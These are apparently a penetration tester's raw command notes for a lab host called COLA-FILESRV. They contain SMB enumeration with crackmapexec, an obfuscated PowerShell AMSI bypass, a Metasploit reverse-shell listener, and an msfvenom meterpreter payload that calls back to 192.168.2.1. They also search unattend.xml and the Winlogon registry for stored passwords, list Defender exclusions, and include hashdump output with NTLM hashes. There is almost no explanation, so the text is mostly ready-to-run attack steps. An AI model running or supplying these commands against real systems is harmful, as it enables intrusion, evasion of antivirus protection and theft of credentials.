COLA-FILESRV

nmap -sV 192.168.2.0/24

nmap -sV 192.168.2.21 -sC

crackmapexec smb 192.168.2.0/24 -u '' -p '' --shares

crackmapexec smb 192.168.2.0/24 -u 'Guest' -p '' --shares

crackmapexec smb 192.168.2.0/24 -u 'Guest' -p '' --shares

smbclient -N \\\\192.168.2.21\\files

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) >  set LHOST 192.168.2.1
LHOST => 192.168.2.1
msf5 exploit(multi/handler) > run

msfvenom -p windows/x64/meterpreter_reverse_tcp -f psh LHOST=192.168.2.1 -o payload.ps1

use post/windows/gather/enum_unattend
type C:\Windows\Panther\unattend.xml

Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "DefaultPassword"

(Get-MpPreference).Exclusionpath

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5080c59420d5da01b197e2920da4e0a9:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
testuser:1000:aad3b435b51404eeaad3b435b51404ee:64cbb76dcafe2e977794f6251f8231fb:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::